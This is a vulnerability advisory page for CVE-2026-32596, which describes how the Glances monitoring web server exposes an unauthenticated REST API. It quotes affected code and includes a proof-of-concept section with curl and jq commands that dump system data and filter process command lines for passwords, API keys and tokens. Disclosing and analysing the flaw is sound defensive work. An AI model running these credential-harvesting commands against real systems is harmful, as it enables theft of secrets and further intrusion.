Skip to main content

Python CVE-2026-32596

HIGH
Information Exposure (CWE-200)
2026-03-16 https://github.com/nicolargo/glances GHSA-wvxv-4j8q-4wjq
Python Docker Information Disclosure Suse
7.5
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.5 HIGH
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
SUSE
HIGH
qualitative

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

Lifecycle Timeline

3
Analysis Generated
Mar 16, 2026 - 17:20 vuln.today
Patch released
Mar 16, 2026 - 17:20 nvd
Patch available
CVE Published
Mar 16, 2026 - 16:23 nvd
HIGH 7.5

DescriptionGitHub Advisory

Summary

Glances web server runs without authentication by default when started with glances -w, exposing REST API with sensitive system information including process command-lines containing credentials (passwords, API keys, tokens) to any network client.

Details

Root Cause: Authentication is optional and disabled by default. When no password is provided, the API router initializes without authentication dependency, and the server binds to 0.0.0.0 exposing all endpoints.

Affected Code:

  • File: glances/outputs/glances_restful_api.py, lines 259-272
python
if self.args.password:
    self._password = GlancesPassword(username=args.username, config=config)
    if JWT_AVAILABLE:
        jwt_secret = config.get_value('outputs', 'jwt_secret_key', default=None)
        jwt_expire = config.get_int_value('outputs', 'jwt_expire_minutes', default=60)
        self._jwt_handler = JWTHandler(secret_key=jwt_secret, expire_minutes=jwt_expire)
        logger.info(f"JWT authentication enabled (token expiration: {jwt_expire} minutes)")
    else:
        self._jwt_handler = None
        logger.info("JWT authentication not available (python-jose not installed)")
else:
    self._password = None
# NO AUTHENTICATION BY DEFAULT
    self._jwt_handler = None
  • File: glances/outputs/glances_restful_api.py, lines 477-480
python
if self.args.password:
    router = APIRouter(prefix=self.url_prefix, dependencies=[Depends(self.authentication)])
else:
    router = APIRouter(prefix=self.url_prefix)
# NO AUTH DEPENDENCY
  • File: glances/outputs/glances_restful_api.py, lines 98-99
python
self.bind_address = args.bind_address or "0.0.0.0"
# BINDS TO ALL INTERFACES
self.port = args.port or 61208
  • File: glances/plugins/processlist/__init__.py, lines 127-140
python
enable_stats = [
    'cpu_percent',
    'memory_percent',
    'memory_info',
    'pid',
    'username',
    'cpu_times',
    'num_threads',
    'nice',
    'status',
    'io_counters',
    'cpu_num',
    'cmdline',
# FULL COMMAND LINE EXPOSED, NO SANITIZATION
]

PoC

  1. Start Glances in default web server mode:
bash
glances -w
# Output: Glances Web User Interface started on http://0.0.0.0:61208/
  1. Access API without authentication from any network client:
bash
curl -s http://TARGET:61208/api/4/system | jq .

<img width="593" height="265" alt="image" src="https://github.com/user-attachments/assets/4ec461be-b480-46d5-88e2-f4004f4dae54" />

  1. Extract system information:
bash
curl -s http://TARGET:61208/api/4/all > system_dump.json

<img width="688" height="547" alt="image" src="https://github.com/user-attachments/assets/7564fb2a-7d94-4c26-848a-03034214b8c7" />

  1. Harvest credentials from process list:
bash
curl -s http://TARGET:61208/api/4/processlist | \
  jq -r '.[] | select(.cmdline | tostring | test("password|api-key|token|secret"; "i")) |
  {pid, username, process: .name, cmdline}'
  1. Example credential exposure:
json
{
  "pid": 4059,
  "username": "root",
  "process": "python3",
  "cmdline": [
    "python3",
    "-c",
    "import time; time.sleep(3600)",
    "--api-key=sk-super-secret-token-12345",
    "--password=MySecretPassword123",
    "--db-pass=admin123"
  ]
}

Impact

Complete system reconnaissance and credential harvesting from any network client. Exposed endpoints include system info, process lists with full command-line arguments (containing passwords/API keys/tokens), network connections, filesystems, and Docker containers. Enables lateral movement and targeted attacks using stolen credentials.

AnalysisAI

Glances web server exposes its REST API without authentication by default when started with the -w flag, allowing unauthenticated remote attackers to access sensitive system information including process details that may contain credentials such as passwords and API keys. The vulnerability affects Python and Docker deployments where Glances is exposed to untrusted networks due to the server binding to 0.0.0.0 with authentication disabled by default. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Start Glances with web flag
Exploit
Connect to unauthenticated REST API
Execution
Retrieve system process information
Impact
Extract credentials from command-lines
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Glances web server started with `glances -w` flag without password argument on default configuration binding to 0.0.0.0. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Exposed information (credentials, internal paths, user data, configuration) can be leveraged for further attacks or regulatory violations. Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker triggers error conditions or accesses improperly protected endpoints to extract sensitive internal information from the application.
Remediation A vendor patch is available — apply it immediately. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Identify all systems running Glances in web mode (-w flag) using network scanning or asset inventory tools, and immediately isolate them or restrict network access. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-48039 CRITICAL POC
9.1 Jun 11

Unauthenticated remote attackers can invoke MCP tool handlers and exfiltrate the operator's long-lived Meta Graph API ac
CVE-2026-20251 HIGH
8.8 Jun 10

Remote code execution in Splunk Enterprise, Splunk Cloud Platform, and the Splunk Secure Gateway app allows a low-privil
CVE-2026-53753 CRITICAL
9.8 Jun 16

Unauthenticated remote code execution in Crawl4AI versions <= 0.8.6 allows attackers to escape the AST-based sandbox in

CVE-2026-48519 CRITICAL
9.6 Jun 16

Remote code execution in Langflow versions through 1.9.1 allows unauthenticated attackers to execute arbitrary Python co
CVE-2026-45833 CRITICAL
9.4 Jun 12

Authenticated remote code execution in ChromaDB Python project versions 0.4.17 and later enables attackers holding the U

Vendor StatusVendor

SUSE

Severity: High
Product Status
openSUSE Tumbleweed Fixed

Share

CVE-2026-32596 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy